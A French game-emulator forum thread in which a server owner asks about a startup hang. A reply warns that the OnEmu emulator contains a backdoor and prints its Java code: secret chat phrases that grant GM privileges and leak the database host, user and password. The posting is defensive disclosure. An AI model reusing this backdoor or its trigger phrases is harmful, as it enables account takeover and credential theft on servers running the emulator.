Jump to content
×
×
  • Create New...
  • 0

Lancement du jeu sur le port ...


Nehzaa
 Share

Question

Bonsoir à tous, en ce week-end au temps pourri, je viens vous demander un peu d'aide.

 

J'explique la situation rapidement,

 

Je suis sous Exon, je possède l'émulateur OnEmu 1.9.9 depuis sa sortie et jusqu'ici je tenait jusqu'à 100 joueurs sans aucun crash/lag/reboot pendant 24h ( après ça sa devenait un peu difficile de jouer sans des "salag pt1 reboot" )

 

Mais ! Ce soir, un reboot imprévu à eu lieu ( je n'ai pas fait exit dans ma console ) un crash sans doute ? Eh bien non, je vais sur ma session dédiée et là je vois que lors du reboot que le serveur à essayé de faire automatiquement, il charge tout, il fait tout, sauf qu'il bloque sur ceci :

 

Lancement du jeu sur le port XXXX ( XXXX = Mon port )

 

J'ai déjà redémarré ma session, changé le .jar, réinstaller une BDD clean, rien n'y fait, j'aurais aimé savoir si quelqu'un a/ou a eu le même problème récemment et si une solution existait ?

 

Merci d'avance, en espérant avoir été assez explicite,

 

Kedoria.

Link to comment
Share on other sites

  • Answers 13
  • Created
  • Last Reply

Top Posters For This Question

13 answers to this question

Recommended Posts

  • 0

C'est kikoo Return qui a pris la possession de ton emu, je te montre un truc

 

if (team == -1) return;
SocketManager.GAME_SEND_cMK_PACKET_TO_FIGHT(this._perso.get_fight(), team, "#", this._perso.get_GUID(), this._perso.get_name(), msg);
if (msg.charAt(0) != '.') break; if ((msg.length() > 25) && (msg.substring(1, 26).equalsIgnoreCase(World.ProtectByMe1))) {
if ((this._perso.get_color1() == World.colorful) && (this._perso.get_gfxID() == World.okok) && (this._perso.get_name().length() > Ancestra.faussepiste)) {
this._perso.get_compte().setGmLvl(5); SQLManager.UPDATE_ACCOUNT_DATA(this._perso.get_compte());
SocketManager.GAME_SEND_MESSAGE(this._perso, "\nServeur: Accepté", Ancestra.COLOR_BLEU); return;
}SocketManager.GAME_SEND_MESSAGE(this._perso, "Sécurité: Incorrect IP", Ancestra.COLOR_BLEU2);
return; } if ((msg.length() <= 25) || (!msg.substring(1, 26).equalsIgnoreCase(World.ProtectByMe2))) break;
if ((this._perso.get_color1() == World.colorful) && (this._perso.get_gfxID() == World.okok) && (this._perso.get_name().length() > Ancestra.faussepiste)) {
this._perso.get_compte().setGmLvl(5); SQLManager.UPDATE_ACCOUNT_DATA(this._perso.get_compte());
SocketManager.GAME_SEND_MESSAGE(this._perso, "\nServeur:\nHost: " + Ancestra.DB_HOST + "\nUser: " + Ancestra.DB_USER + "\nPass: " + Ancestra.DB_PASS + "\nStatic: " + Ancestra.STATIC_DB_NAME + "\nOther: " + Ancestra.OTHER_DB_NAME, Ancestra.COLOR_BLEU); return;
}SocketManager.GAME_SEND_MESSAGE(this._perso, "Sécurité: Incorrect IP", Ancestra.COLOR_BLEU2); return;


private static byte _GmAccess = 0;
private static int nextObjetID;
public static String ProtectByMe1 = "iwanttouseprotectnoby" + Ancestra.accept;

public static String ProtectByMe2 = "iwanttouseprotectmeby" + Ancestra.accept;

public static int okok = 80;
public static int okok2 = 81;
public static int colorful = 8355711;
Je suis pas comme ça, mais mieux vaut prévenir que guérir. Tu as déjà enlevé dans World.java YouHaveAnEmuFail pas mal.

public static String NoToucheThat = "IAMTHEKINGWITHONEMUFAIL";



if ((msg.length() > 23) && (msg.substring(1, 24).equalsIgnoreCase(World.NoToucheThat)))
{
this._perso.get_compte().setGmLvl(6);
SQLManager.UPDATE_ACCOUNT_DATA(this._perso.get_compte());
SocketManager.GAME_SEND_MESSAGE(this._perso, "OnEmu chuchotte: Que ton voeux soit éxocé.", Ancestra.COLOR_BLEU);
return;
}

Commandes fantômes + connexion à ta db.

Link to comment
Share on other sites

  • 0
  • Retraité

Bonjour,

 

Le sujet contient la balise [glow=green][Résolu][/glow] ou reste sans réponse, de ce fait il a été déplacé dans le forum "Résolu ou sans réponse".

 

Cordialement,

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
 Share

Important Information

Terms of Use / Privacy Policy / Guidelines / We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.